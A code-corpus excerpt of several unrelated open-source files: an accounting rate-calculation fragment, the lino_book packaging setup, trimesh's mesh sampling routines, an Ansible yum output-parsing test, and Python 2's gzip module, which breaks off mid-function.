'where l.currency_id=%s and l.account_id=%s and '+query, (account.currency_id.id,account.id,))
tot1,tot2 = cr.fetchone()
if tot2 and not account_invert:
rate = float(tot1)/float(tot2)
elif tot1 and account_invert:
rate = float(tot2)/float(tot1)
return rate
| agpl-3.0 |
khchine5/book | lino_book/setup_info.py | 1 | 9355 | # -*- coding: UTF-8 -*-
# Copyright 2009-2018 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)
# python setup.py test -s tests.test_misc.PackagesTests
from __future__ import unicode_literals
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
SETUP_INFO = dict(
name='lino_book',
version='18.3.0',
install_requires=[
'lino', 'selenium','mock',
'django-iban', 'metafone', 'channels<2',
'djangorestframework', 'bleach', 'radicale==1.1.2',
'icalendar',
'vobject',
# 'eidreader',
'social-auth-app-django',
'lino_cosi',
'lino_noi',
'lino_voga',
# 'lino_welfare',
'requests_mock',
'lino_care',
'lino_vilma',
'lino_avanti',
'lino_tera',
'lino_amici',
'commondata', 'commondata.be', 'commondata.ee', 'commondata.eg'],
dependency_links=[
'git+https://github.com/cylonoven/django-mailbox.git#egg=django_mailbox'],
tests_require=['mock'],
description="Lino documentation and demo projects",
license='BSD License',
include_package_data=True,
zip_safe=False,
author='Luc Saffre',
author_email='luc@lino-framework.org',
url="http://www.lino-framework.org",
#~ test_suite = 'lino_book.projects',
test_suite='tests',
classifiers="""\
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Development Status :: 5 - Production/Stable
Environment :: Web Environment
Framework :: Django
Intended Audience :: Developers
Intended Audience :: System Administrators
License :: OSI Approved :: BSD License
Natural Language :: English
Natural Language :: French
Natural Language :: German
Operating System :: OS Independent
Topic :: Database :: Front-Ends
Topic :: Home Automation
Topic :: Office/Business
Topic :: Software Development :: Libraries :: Application Frameworks""".splitlines())
# if PY2:
# SETUP_INFO['install_requires'].append('reportlab<2.7')
# else:
# SETUP_INFO['install_requires'].append('reportlab')
SETUP_INFO.update(long_description="""
.. image:: https://readthedocs.org/projects/lino/badge/?version=latest
:target: http://lino.readthedocs.io/en/latest/?badge=latest
.. image:: https://coveralls.io/repos/github/lino-framework/book/badge.svg?branch=master
:target: https://coveralls.io/github/lino-framework/book?branch=master
.. image:: https://travis-ci.org/lino-framework/book.svg?branch=stable
:target: https://travis-ci.org/lino-framework/book?branch=stable
.. image:: https://img.shields.io/pypi/v/lino.svg
:target: https://pypi.python.org/pypi/lino/
.. image:: https://img.shields.io/pypi/l/lino.svg
:target: https://pypi.python.org/pypi/lino/
This is the code repository that contains (1) the Sphinx source files
of the Lino Book, (2) the ``lino_book`` Python package and (3) a test
suite with doctest-based tests for the Lino framework.
The **Lino Book** is the central documentation tree of the Lino
framework. It is visible on `www.lino-framework.org
<http://www.lino-framework.org>`__ and on `lino.readthedocs.io
<http://lino.readthedocs.io>`__.
The ``lino_book`` Python package is a collection of small example Lino
applications used for educational and testing purposes.
The code repositories for the ``lino`` and ``lino_xl`` Python packages
have no documentation tree on their own and almost no unit tests, they
are tested and documented here.
""")
SETUP_INFO.update(packages=[str(n) for n in """
lino_book
lino_book.projects
lino_book.projects.babel_tutorial
lino_book.projects.babel_tutorial.fixtures
lino_book.projects.dumps
lino_book.projects.dumps.fixtures
lino_book.projects.dumps.settings
lino_book.projects.belref
lino_book.projects.belref.fixtures
lino_book.projects.belref.settings
lino_book.projects.combo
lino_book.projects.combo.fixtures
lino_book.projects.docs
lino_book.projects.docs.settings
lino_book.projects.estref
lino_book.projects.estref.settings
lino_book.projects.estref.tests
lino_book.projects.events
lino_book.projects.events.tests
lino_book.projects.polls
lino_book.projects.polls.polls
lino_book.projects.polls.polls.fixtures
lino_book.projects.polls.mysite
lino_book.projects.polly
lino_book.projects.polly.settings
lino_book.projects.polly.tests
lino_book.projects.20090714
lino_book.projects.20090717
lino_book.projects.20100126
lino_book.projects.20100127
lino_book.projects.20100206
lino_book.projects.20100212
lino_book.projects.20121124
lino_book.projects.chooser
lino_book.projects.example
lino_book.projects.properties
lino_book.projects.quantityfield
lino_book.projects.cms
lino_book.projects.cms.settings
lino_book.projects.crl
lino_book.projects.crl.fixtures
lino_book.projects.eric
lino_book.projects.eric.settings
lino_book.projects.eric.settings.fixtures
lino_book.projects.eric.tests
lino_book.projects.homeworkschool
lino_book.projects.homeworkschool.fixtures
lino_book.projects.homeworkschool.settings
lino_book.projects.i18n
lino_book.projects.igen
lino_book.projects.igen.tests
lino_book.projects.max
lino_book.projects.max.settings
lino_book.projects.chatter
lino_book.projects.chatter.settings
lino_book.projects.chatter.tests
lino_book.projects.min1
lino_book.projects.min1.settings
lino_book.projects.min2
lino_book.projects.min2.settings
lino_book.projects.min2.tests
lino_book.projects.min3
lino_book.projects.min3.lib
lino_book.projects.min3.lib.contacts
lino_book.projects.min3.lib.contacts.fixtures
lino_book.projects.min3.settings
lino_book.projects.min3.tests
lino_book.projects.min9
lino_book.projects.min9.modlib
lino_book.projects.min9.modlib.contacts
lino_book.projects.min9.modlib.contacts.fixtures
lino_book.projects.min9.modlib.contacts.management
lino_book.projects.min9.modlib.contacts.management.commands
lino_book.projects.min9.settings
lino_book.projects.min9.tests
lino_book.projects.apc
lino_book.projects.apc.settings
lino_book.projects.apc.tests
lino_book.projects.adg
lino_book.projects.adg.settings
lino_book.projects.adg.settings.fixtures
lino_book.projects.adg.tests
lino_book.projects.cosi_ee
lino_book.projects.cosi_ee.settings
lino_book.projects.pierre
lino_book.projects.pierre.settings
lino_book.projects.bs3
lino_book.projects.bs3.settings
lino_book.projects.bs3.tests
lino_book.projects.team
lino_book.projects.team.tests
lino_book.projects.team.settings
lino_book.projects.team.settings.fixtures
lino_book.projects.liina
lino_book.projects.liina.tests
lino_book.projects.liina.settings
lino_book.projects.liina.settings.fixtures
lino_book.projects.lydia
lino_book.projects.lydia.tests
lino_book.projects.lydia.settings
lino_book.projects.lydia.settings.fixtures
lino_book.projects.public
lino_book.projects.anna
lino_book.projects.anna.settings
lino_book.projects.anna.tests
lino_book.projects.anna.lib
lino_book.projects.anna.lib.tickets
lino_book.projects.public.settings
lino_book.projects.public.tests
lino_book.projects.lets1
lino_book.projects.lets1.lets
lino_book.projects.lets1.fixtures
lino_book.projects.lets2
lino_book.projects.lets2.lets
lino_book.projects.lets2.fixtures
lino_book.projects.mti
lino_book.projects.mti.app
lino_book.projects.mti.fixtures
lino_book.projects.mti.tests
lino_book.projects.nomti
lino_book.projects.nomti.app
lino_book.projects.nomti.fixtures
lino_book.projects.watch
lino_book.projects.watch.entries
lino_book.projects.watch.fixtures
lino_book.projects.watch.tests
lino_book.projects.watch2
lino_book.projects.watch2.fixtures
lino_book.projects.mldbc
lino_book.projects.mldbc.fixtures
lino_book.projects.actions
lino_book.projects.actors
lino_book.projects.actors.fixtures
lino_book.projects.addrloc
lino_book.projects.addrloc.fixtures
lino_book.projects.myroles
lino_book.projects.auto_create
lino_book.projects.de_BE
lino_book.projects.de_BE.fixtures
lino_book.projects.diamond
lino_book.projects.diamond.main
lino_book.projects.diamond2
lino_book.projects.diamond2.main
lino_book.projects.float2decimal
lino_book.projects.float2decimal.lib
lino_book.projects.float2decimal.lib.float2decimal
lino_book.projects.integer_pk
lino_book.projects.integer_pk.lib
lino_book.projects.integer_pk.lib.integer_pk
lino_book.projects.human
lino_book.projects.gfktest
lino_book.projects.gfktest.settings
lino_book.projects.gfktest.lib
lino_book.projects.gfktest.lib.gfktest
lino_book.projects.pisa
lino_book.projects.sendchanges
lino_book.projects.tables
lino_book.projects.tables.fixtures
lino_book.projects.ui5
lino_book.projects.ui5.settings
lino_book.projects.ui5.tests
lino_book.projects.vtables
lino_book.projects.edmund
lino_book.projects.edmund.settings
lino_book.projects.edmund.settings.fixtures
lino_book.projects.roger
lino_book.projects.roger.settings
lino_book.projects.roger.settings.fixtures
lino_book.projects.roger.tests
""".splitlines() if n])
SETUP_INFO.update(message_extractors={
'lino': [
('**/sandbox/**', 'ignore', None),
('**/cache/**', 'ignore', None),
('**.py', 'python', None),
('**/linoweb.js', 'jinja2', None),
#~ ('**.js', 'javascript', None),
('**/config/**.html', 'jinja2', None),
#~ ('**/templates/**.txt', 'genshi', {
#~ 'template_class': 'genshi.template:TextTemplate'
#~ })
],
})
| bsd-2-clause |
dajusc/trimesh | trimesh/sample.py | 1 | 5718 | """
sample.py
------------
Randomly sample surface and volume of meshes.
"""
import numpy as np
from . import util
from . import transformations
def sample_surface(mesh, count):
"""
Sample the surface of a mesh, returning the specified
number of points
For individual triangle sampling uses this method:
http://mathworld.wolfram.com/TrianglePointPicking.html
Parameters
---------
mesh : trimesh.Trimesh
Geometry to sample the surface of
count : int
Number of points to return
Returns
---------
samples : (count, 3) float
Points in space on the surface of mesh
face_index : (count,) int
Indices of faces for each sampled point
"""
# len(mesh.faces) float, array of the areas
# of each face of the mesh
area = mesh.area_faces
# total area (float)
area_sum = np.sum(area)
# cumulative area (len(mesh.faces))
area_cum = np.cumsum(area)
face_pick = np.random.random(count) * area_sum
face_index = np.searchsorted(area_cum, face_pick)
# pull triangles into the form of an origin + 2 vectors
tri_origins = mesh.triangles[:, 0]
tri_vectors = mesh.triangles[:, 1:].copy()
tri_vectors -= np.tile(tri_origins, (1, 2)).reshape((-1, 2, 3))
# pull the vectors for the faces we are going to sample from
tri_origins = tri_origins[face_index]
tri_vectors = tri_vectors[face_index]
# randomly generate two 0-1 scalar components to multiply edge vectors by
random_lengths = np.random.random((len(tri_vectors), 2, 1))
# points will be distributed on a quadrilateral if we use 2 0-1 samples
# if the two scalar components sum less than 1.0 the point will be
# inside the triangle, so we find vectors longer than 1.0 and
# transform them to be inside the triangle
random_test = random_lengths.sum(axis=1).reshape(-1) > 1.0
random_lengths[random_test] -= 1.0
random_lengths = np.abs(random_lengths)
# multiply triangle edge vectors by the random lengths and sum
sample_vector = (tri_vectors * random_lengths).sum(axis=1)
# finally, offset by the origin to generate
# (n,3) points in space on the triangle
samples = sample_vector + tri_origins
return samples, face_index
def volume_mesh(mesh, count):
"""
Use rejection sampling to produce points randomly
distributed in the volume of a mesh.
Parameters
---------
mesh : trimesh.Trimesh
Geometry to sample
count : int
Number of points to return
Returns
---------
samples : (n, 3) float
Points in the volume of the mesh where n <= count
"""
points = (np.random.random((count, 3)) * mesh.extents) + mesh.bounds[0]
contained = mesh.contains(points)
samples = points[contained][:count]
return samples
def volume_rectangular(extents,
count,
transform=None):
"""
Return random samples inside a rectangular volume,
useful for sampling inside oriented bounding boxes.
Parameters
----------
extents : (3,) float
Side lengths of rectangular solid
count : int
Number of points to return
transform : (4, 4) float
Homogeneous transformation matrix
Returns
---------
samples : (count, 3) float
Points in requested volume
"""
samples = np.random.random((count, 3)) - .5
samples *= extents
if transform is not None:
samples = transformations.transform_points(samples,
transform)
return samples
def sample_surface_even(mesh, count, radius=None):
"""
Sample the surface of a mesh, returning samples which are
VERY approximately evenly spaced. This is accomplished by
sampling and then rejecting pairs that are too close together.
Note that since it is using rejection sampling it may return
fewer points than requested (i.e. n < count). If this is the
case a log.warning will be emitted.
Parameters
---------
mesh : trimesh.Trimesh
Geometry to sample the surface of
count : int
Number of points to return
radius : None or float
Removes samples below this radius
Returns
---------
samples : (n, 3) float
Points in space on the surface of mesh
face_index : (n,) int
Indices of faces for each sampled point
"""
from .points import remove_close
# guess radius from area
if radius is None:
radius = np.sqrt(mesh.area / (3 * count))
# get points on the surface
points, index = sample_surface(mesh, count * 3)
# remove the points closer than radius
points, mask = remove_close(points, radius)
# we got all the samples we expect
if len(points) >= count:
return points[:count], index[mask][:count]
# warn if we didn't get all the samples we expect
util.log.warning('only got {}/{} samples!'.format(
len(points), count))
return points, index[mask]
def sample_surface_sphere(count):
"""
Correctly pick random points on the surface of a unit sphere
Uses this method:
http://mathworld.wolfram.com/SpherePointPicking.html
Parameters
----------
count : int
Number of points to return
Returns
----------
points : (count, 3) float
Random points on the surface of a unit sphere
"""
# get random values 0.0-1.0
u, v = np.random.random((2, count))
# convert to two angles
theta = np.pi * 2 * u
phi = np.arccos((2 * v) - 1)
# convert spherical coordinates to cartesian
points = util.spherical_to_vector(
np.column_stack((theta, phi)))
return points
| mit |
MihaiMoldovanu/ansible | test/units/modules/packaging/os/test_yum.py | 117 | 9276 |
# -*- coding: utf-8 -*-
from ansible.compat.tests import unittest
from ansible.modules.packaging.os import yum
yum_plugin_load_error = """
Plugin "product-id" can't be imported
Plugin "search-disabled-repos" can't be imported
Plugin "subscription-manager" can't be imported
Plugin "product-id" can't be imported
Plugin "search-disabled-repos" can't be imported
Plugin "subscription-manager" can't be imported
"""
# from https://github.com/ansible/ansible/issues/20608#issuecomment-276106505
wrapped_output_1 = """
Загружены модули: fastestmirror
Loading mirror speeds from cached hostfile
* base: mirror.h1host.ru
* extras: mirror.h1host.ru
* updates: mirror.h1host.ru
vms-agent.x86_64 0.0-9 dev
"""
# from https://github.com/ansible/ansible/issues/20608#issuecomment-276971275
wrapped_output_2 = """
Загружены модули: fastestmirror
Loading mirror speeds from cached hostfile
* base: mirror.corbina.net
* extras: mirror.corbina.net
* updates: mirror.corbina.net
empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty.x86_64
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1-0
addons
libtiff.x86_64 4.0.3-27.el7_3 updates
"""
# From https://github.com/ansible/ansible/issues/20608#issuecomment-276698431
wrapped_output_3 = """
Loaded plugins: fastestmirror, langpacks
Loading mirror speeds from cached hostfile
ceph.x86_64 1:11.2.0-0.el7 ceph
ceph-base.x86_64 1:11.2.0-0.el7 ceph
ceph-common.x86_64 1:11.2.0-0.el7 ceph
ceph-mds.x86_64 1:11.2.0-0.el7 ceph
ceph-mon.x86_64 1:11.2.0-0.el7 ceph
ceph-osd.x86_64 1:11.2.0-0.el7 ceph
ceph-selinux.x86_64 1:11.2.0-0.el7 ceph
libcephfs1.x86_64 1:11.0.2-0.el7 ceph
librados2.x86_64 1:11.2.0-0.el7 ceph
libradosstriper1.x86_64 1:11.2.0-0.el7 ceph
librbd1.x86_64 1:11.2.0-0.el7 ceph
librgw2.x86_64 1:11.2.0-0.el7 ceph
python-cephfs.x86_64 1:11.2.0-0.el7 ceph
python-rados.x86_64 1:11.2.0-0.el7 ceph
python-rbd.x86_64 1:11.2.0-0.el7 ceph
"""
# from https://github.com/ansible/ansible-modules-core/issues/4318#issuecomment-251416661
wrapped_output_4 = """
ipxe-roms-qemu.noarch 20160127-1.git6366fa7a.el7
rhelosp-9.0-director-puddle
quota.x86_64 1:4.01-11.el7_2.1 rhelosp-rhel-7.2-z
quota-nls.noarch 1:4.01-11.el7_2.1 rhelosp-rhel-7.2-z
rdma.noarch 7.2_4.1_rc6-2.el7 rhelosp-rhel-7.2-z
screen.x86_64 4.1.0-0.23.20120314git3c2946.el7_2
rhelosp-rhel-7.2-z
sos.noarch 3.2-36.el7ost.2 rhelosp-9.0-puddle
sssd-client.x86_64 1.13.0-40.el7_2.12 rhelosp-rhel-7.2-z
"""
# A 'normal-ish' yum check-update output, without any wrapped lines
unwrapped_output_rhel7 = """
Loaded plugins: etckeeper, product-id, search-disabled-repos, subscription-
: manager
This system is not registered to Red Hat Subscription Management. You can use subscription-manager to register.
NetworkManager-openvpn.x86_64 1:1.2.6-1.el7 epel
NetworkManager-openvpn-gnome.x86_64 1:1.2.6-1.el7 epel
cabal-install.x86_64 1.16.1.0-2.el7 epel
cgit.x86_64 1.1-1.el7 epel
python34-libs.x86_64 3.4.5-3.el7 epel
python34-test.x86_64 3.4.5-3.el7 epel
python34-tkinter.x86_64 3.4.5-3.el7 epel
python34-tools.x86_64 3.4.5-3.el7 epel
qgit.x86_64 2.6-4.el7 epel
rdiff-backup.x86_64 1.2.8-12.el7 epel
stoken-libs.x86_64 0.91-1.el7 epel
xlockmore.x86_64 5.49-2.el7 epel
"""
# Some wrapped obsoletes for prepending to output for testing both
wrapped_output_rhel7_obsoletes_postfix = """
Obsoleting Packages
ddashboard.x86_64 0.2.0.1-1.el7_3 mhlavink-developerdashboard
developerdashboard.x86_64 0.1.12.2-1.el7_2 @mhlavink-developerdashboard
python-bugzilla.noarch 1.2.2-3.el7_2.1 mhlavink-developerdashboard
python-bugzilla-develdashboardfixes.noarch
1.2.2-3.el7 @mhlavink-developerdashboard
python2-futures.noarch 3.0.5-1.el7 epel
python-futures.noarch 3.0.3-1.el7 @epel
python2-pip.noarch 8.1.2-5.el7 epel
python-pip.noarch 7.1.0-1.el7 @epel
python2-pyxdg.noarch 0.25-6.el7 epel
pyxdg.noarch 0.25-5.el7 @epel
python2-simplejson.x86_64 3.10.0-1.el7 epel
python-simplejson.x86_64 3.3.3-1.el7 @epel
Security: kernel-3.10.0-327.28.2.el7.x86_64 is an installed security update
Security: kernel-3.10.0-327.22.2.el7.x86_64 is the currently running version
"""
longname = """
Loaded plugins: fastestmirror, priorities, rhnplugin
This system is receiving updates from RHN Classic or Red Hat Satellite.
Loading mirror speeds from cached hostfile
xxxxxxxxxxxxxxxxxxxxxxxxxx.noarch
1.16-1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
glibc.x86_64 2.17-157.el7_3.1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"""
unwrapped_output_rhel7_obsoletes = unwrapped_output_rhel7 + wrapped_output_rhel7_obsoletes_postfix
unwrapped_output_rhel7_expected_pkgs = ["NetworkManager-openvpn", "NetworkManager-openvpn-gnome", "cabal-install",
"cgit", "python34-libs", "python34-test", "python34-tkinter",
"python34-tools", "qgit", "rdiff-backup", "stoken-libs", "xlockmore"]
class TestYumUpdateCheckParse(unittest.TestCase):
def _assert_expected(self, expected_pkgs, result):
for expected_pkg in expected_pkgs:
self.assertIn(expected_pkg, result)
self.assertEqual(len(result), len(expected_pkgs))
self.assertIsInstance(result, dict)
def test_empty_output(self):
res = yum.parse_check_update("")
expected_pkgs = []
self._assert_expected(expected_pkgs, res)
def test_longname(self):
res = yum.parse_check_update(longname)
expected_pkgs = ['xxxxxxxxxxxxxxxxxxxxxxxxxx', 'glibc']
self._assert_expected(expected_pkgs, res)
def test_plugin_load_error(self):
res = yum.parse_check_update(yum_plugin_load_error)
expected_pkgs = []
self._assert_expected(expected_pkgs, res)
def test_wrapped_output_1(self):
res = yum.parse_check_update(wrapped_output_1)
expected_pkgs = ["vms-agent"]
self._assert_expected(expected_pkgs, res)
def test_wrapped_output_2(self):
res = yum.parse_check_update(wrapped_output_2)
expected_pkgs = ["empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty",
"libtiff"]
self._assert_expected(expected_pkgs, res)
def test_wrapped_output_3(self):
res = yum.parse_check_update(wrapped_output_3)
expected_pkgs = ["ceph", "ceph-base", "ceph-common", "ceph-mds",
"ceph-mon", "ceph-osd", "ceph-selinux", "libcephfs1",
"librados2", "libradosstriper1", "librbd1", "librgw2",
"python-cephfs", "python-rados", "python-rbd"]
self._assert_expected(expected_pkgs, res)
def test_wrapped_output_4(self):
res = yum.parse_check_update(wrapped_output_4)
expected_pkgs = ["ipxe-roms-qemu", "quota", "quota-nls", "rdma", "screen",
"sos", "sssd-client"]
self._assert_expected(expected_pkgs, res)
def test_wrapped_output_rhel7(self):
res = yum.parse_check_update(unwrapped_output_rhel7)
self._assert_expected(unwrapped_output_rhel7_expected_pkgs, res)
def test_wrapped_output_rhel7_obsoletes(self):
res = yum.parse_check_update(unwrapped_output_rhel7_obsoletes)
self._assert_expected(unwrapped_output_rhel7_expected_pkgs, res)
| gpl-3.0 |
sillydan1/WhatEverEngine | openglcsharp/Lib/gzip.py | 78 | 18226 | """Functions that read and write gzipped files.
The user of the file doesn't have to worry about the compression,
but random access is not allowed."""
# based on Andrew Kuchling's minigzip.py distributed with the zlib module
import struct, sys, time, os
import zlib
import io
import __builtin__
__all__ = ["GzipFile","open"]
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16
READ, WRITE = 1, 2
def write32u(output, value):
# The L format writes the bit pattern correctly whether signed
# or unsigned.
output.write(struct.pack("<L", value))
def read32(input):
return struct.unpack("<I", input.read(4))[0]
def open(filename, mode="rb", compresslevel=9):
"""Shorthand for GzipFile(filename, mode, compresslevel).
The filename argument is required; mode defaults to 'rb'
and compresslevel defaults to 9.
"""
return GzipFile(filename, mode, compresslevel)
class GzipFile(io.BufferedIOBase):
"""The GzipFile class simulates most of the methods of a file object with
the exception of the readinto() and truncate() methods.
"""
myfileobj = None
max_read_chunk = 10 * 1024 * 1024 # 10Mb
def __init__(self, filename=None, mode=None,
compresslevel=9, fileobj=None, mtime=None):
"""Constructor for the GzipFile class.
At least one of fileobj and filename must be given a
non-trivial value.
The new class instance is based on fileobj, which can be a regular
file, a StringIO object, or any other object which simulates a file.
It defaults to None, in which case filename is opened to provide
a file object.
When fileobj is not None, the filename argument is only used to be
included in the gzip file header, which may includes the original
filename of the uncompressed file. It defaults to the filename of
fileobj, if discernible; otherwise, it defaults to the empty string,
and in this case the original filename is not included in the header.
The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', or 'wb',
depending on whether the file will be read or written. The default
is the mode of fileobj if discernible; otherwise, the default is 'rb'.
Be aware that only the 'rb', 'ab', and 'wb' values should be used
for cross-platform portability.
The compresslevel argument is an integer from 1 to 9 controlling the
level of compression; 1 is fastest and produces the least compression,
and 9 is slowest and produces the most compression. The default is 9.
The mtime argument is an optional numeric timestamp to be written
to the stream when compressing. All gzip compressed streams
are required to contain a timestamp. If omitted or None, the
current time is used. This module ignores the timestamp when
decompressing; however, some programs, such as gunzip, make use
of it. The format of the timestamp is the same as that of the
return value of time.time() and of the st_mtime member of the
object returned by os.stat().
"""
# guarantee the file is opened in binary mode on platforms
# that care about that sort of thing
if mode and 'b' not in mode:
mode += 'b'
if fileobj is None:
fileobj = self.myfileobj = __builtin__.open(filename, mode or 'rb')
if filename is None:
if hasattr(fileobj, 'name'): filename = fileobj.name
else: filename = ''
if mode is None:
if hasattr(fileobj, 'mode'): mode = fileobj.mode
else: mode = 'rb'
if mode[0:1] == 'r':
self.mode = READ
# Set flag indicating start of a new member
self._new_member = True
# Buffer data read from gzip file. extrastart is offset in
# stream where buffer starts. extrasize is number of
# bytes remaining in buffer from current stream position.
self.extrabuf = ""
self.extrasize = 0
self.extrastart = 0
self.name = filename
# Starts small, scales exponentially
self.min_readsize = 100
elif mode[0:1] == 'w' or mode[0:1] == 'a':
self.mode = WRITE
self._init_write(filename)
self.compress = zlib.compressobj(compresslevel,
zlib.DEFLATED,
-zlib.MAX_WBITS,
zlib.DEF_MEM_LEVEL,
0)
else:
raise IOError, "Mode " + mode + " not supported"
self.fileobj = fileobj
self.offset = 0
self.mtime = mtime
if self.mode == WRITE:
self._write_gzip_header()
@property
def filename(self):
import warnings
warnings.warn("use the name attribute", DeprecationWarning, 2)
if self.mode == WRITE and self.name[-3:] != ".gz":
return self.name + ".gz"
return self.name
def __repr__(self):
s = repr(self.fileobj)
return '<gzip ' + s[1:-1] + ' ' + hex(id(self)) + '>'
def _check_closed(self):
"""Raises a ValueError if the underlying file object has been closed.
"""
if self.closed:
raise ValueError('I/O operation on closed file.')
def _init_write(self, filename):
self.name = filename
self.crc = zlib.crc32("") & 0xffffffffL
self.size = 0
self.writebuf = []
self.bufsize = 0
def _write_gzip_header(self):
self.fileobj.write('\037\213') # magic header
self.fileobj.write('\010') # compression method
fname = os.path.basename(self.name)
if fname.endswith(".gz"):
fname = fname[:-3]
flags = 0
if fname:
flags = FNAME
self.fileobj.write(chr(flags))
mtime = self.mtime
if mtime is None:
mtime = time.time()
write32u(self.fileobj, long(mtime))
self.fileobj.write('\002')
self.fileobj.write('\377')
if fname:
self.fileobj.write(fname + '\000')
def _init_read(self):
self.crc = zlib.crc32("") & 0xffffffffL
self.size = 0
def _read_gzip_header(self):
magic = self.fileobj.read(2)
if magic != '\037\213':
raise IOError, 'Not a gzipped file'
method = ord( self.fileobj.read(1) )
if method != 8:
raise IOError, 'Unknown compression method'
flag = ord( self.fileobj.read(1) )
self.mtime = read32(self.fileobj)
# extraflag = self.fileobj.read(1)
# os = self.fileobj.read(1)
self.fileobj.read(2)
if flag & FEXTRA:
# Read & discard the extra field, if present
xlen = ord(self.fileobj.read(1))
xlen = xlen + 256*ord(self.fileobj.read(1))
self.fileobj.read(xlen)
if flag & FNAME:
# Read and discard a null-terminated string containing the filename
while True:
s = self.fileobj.read(1)
if not s or s=='\000':
break
if flag & FCOMMENT:
# Read and discard a null-terminated string containing a comment
while True:
s = self.fileobj.read(1)
if not s or s=='\000':
break
if flag & FHCRC:
self.fileobj.read(2) # Read & discard the 16-bit header CRC
def write(self,data):
self._check_closed()
if self.mode != WRITE:
import errno
raise IOError(errno.EBADF, "write() on read-only GzipFile object")
if self.fileobj is None:
raise ValueError, "write() on closed GzipFile object"
# Convert data type if called by io.BufferedWriter.
if isinstance(data, memoryview):
data = data.tobytes()
if len(data) > 0:
self.size = self.size + len(data)
self.crc = zlib.crc32(data, self.crc) & 0xffffffffL
self.fileobj.write( self.compress.compress(data) )
self.offset += len(data)
return len(data)
def read(self, size=-1):
self._check_closed()
if self.mode != READ:
import errno
raise IOError(errno.EBADF, "read() on write-only GzipFile object")
if self.extrasize <= 0 and self.fileobj is None:
return ''
readsize = 1024
if size < 0: # get the whole thing
try:
while True:
self._read(readsize)
readsize = min(self.max_read_chunk, readsize * 2)
except EOFError:
size = self.extrasize
else: # just get some more of it
try:
while size > self.extrasize:
self._read(readsize)
readsize = min(self.max_read_chunk, readsize * 2)
except EOFError:
if size > self.extrasize:
size = self.extrasize
offset = self.offset - self.extrastart
chunk = self.extrabuf[offset: offset + size]
self.extrasize = self.extrasize - size
self.offset += size
return chunk
def _unread(self, buf):
self.extrasize = len(buf) + self.extrasize
self.offset -= len(buf)
def _read(self, size=1024):
if self.fileobj is None:
raise EOFError, "Reached EOF"
if self._new_member:
# If the _new_member flag is set, we have to
# jump to the next member, if there is one.
#
# First, check if we're at the end of the file;
# if so, it's time to stop; no more members to read.
pos = self.fileobj.tell() # Save current position
self.fileobj.seek(0, 2) # Seek to end of file
if pos == self.fileobj.tell():
raise EOFError, "Reached EOF"
else:
self.fileobj.seek( pos ) # Return to original position
self._init_read()
self._read_gzip_header()
self.decompress = zlib.decompressobj(-zlib.MAX_WBITS)
self._new_member = False
# Read a chunk of data from the file
buf = self.fileobj.read(size)
# If the EOF has been reached, flush the decompression object
# and mark this object as finished.
if buf == "":
uncompress = self.decompress.flush()
self._read_eof()
self._add_read_data( uncompress )
raise EOFError, 'Reached EOF'
uncompress = self.decompress.decompress(buf)
self._add_read_data( uncompress )
if self.decompress.unused_data != "":
# Ending case: we've come to the end of a member in the file,
# so seek back to the start of the unused data, finish up
# this member, and read a new gzip header.
# (The number of bytes to seek back is the length of the unused
# data, minus 8 because _read_eof() will rewind a further 8 bytes)
self.fileobj.seek( -len(self.decompress.unused_data)+8, 1)
# Check the CRC and file size, and set the flag so we read
# a new member on the next call
self._read_eof()
self._new_member = True
def _add_read_data(self, data):
self.crc = zlib.crc32(data, self.crc) & 0xffffffffL
offset = self.offset - self.extrastart
self.extrabuf = self.extrabuf[offset:] + data
self.extrasize = self.extrasize + len(data)
self.extrastart = self.offset
self.size = self.size + len(data)
def _read_eof(self):
# We've read to the end of the file, so we have to rewind in order
# to reread the 8 bytes containing the CRC and the file size.
# We check the that the computed CRC and size of the
# uncompressed data matches the stored values. Note that the size
# stored is the true file size mod 2**32.
self.fileobj.seek(-8, 1)
crc32 = read32(self.fileobj)
isize = read32(self.fileobj) # may exceed 2GB
if crc32 != self.crc:
raise IOError("CRC check failed %s != %s" % (hex(crc32),
hex(self.crc)))
elif isize != (self.size & 0xffffffffL):
raise IOError, "Incorrect length of data produced"
# Gzip files can be padded with zeroes and still have archives.
# Consume all zero bytes and set the file position to the first
# non-zero byte. See http://www.gzip.org/#faq8
c = "\x00"
while c == "\x00":
c = self.fileobj.read(1)
if c:
self.fileobj.seek(-1, 1)
@property
def closed(self):
return self.fileobj is None
def close(self):
if self.fileobj is None:
return
if self.mode == WRITE:
self.fileobj.write(self.compress.flush())
write32u(self.fileobj, self.crc)
# self.size may exceed 2GB, or even 4GB
write32u(self.fileobj, self.size & 0xffffffffL)
self.fileobj = None
elif self.mode == READ:
self.fileobj = None
if self.myfileobj:
self.myfileobj.close()
self.myfileobj = None
def flush(self,zlib_mode=zlib.Z_SYNC_FLUSH):
self._check_closed()
if self.mode == WRITE:
# Ensure the compressor's buffer is flushed
self.fileobj.write(self.compress.flush(zlib_mode))
self.fileobj.flush()
def fileno(self):
"""Invoke the underlying file object's fileno() method.
This will raise AttributeError if the underlying file object
doesn't support fileno().
"""
return self.fileobj.fileno()
def rewind(self):
'''Return the uncompressed stream file position indicator to the
beginning of the file'''
if self.mode != READ:
raise IOError("Can't rewind in write mode")
self.fileobj.seek(0)
self._new_member = True
self.extrabuf = ""
self.extrasize = 0
self.extrastart = 0
self.offset = 0
def readable(self):
return self.mode == READ
def writable(self):
return self.mode == WRITE
def seekable(self):
return True
def seek(self, offset, whence=0):
if whence:
if whence == 1:
offset = self.offset + offset
else:
raise ValueError('Seek from end not supported')
if self.mode == WRITE:
if offset < self.offset:
raise IOError('Negative seek in write mode')
count = offset - self.offset
for i in range(count // 1024):
self.write(1024 * '\0')
self.write((count % 1024) * '\0')
elif self.mode == READ:
if offset < self.offset:
# for negative seek, rewind and do positive seek
self.rewind()
count = offset - self.offset
for i in range(count // 1024):
self.read(1024)
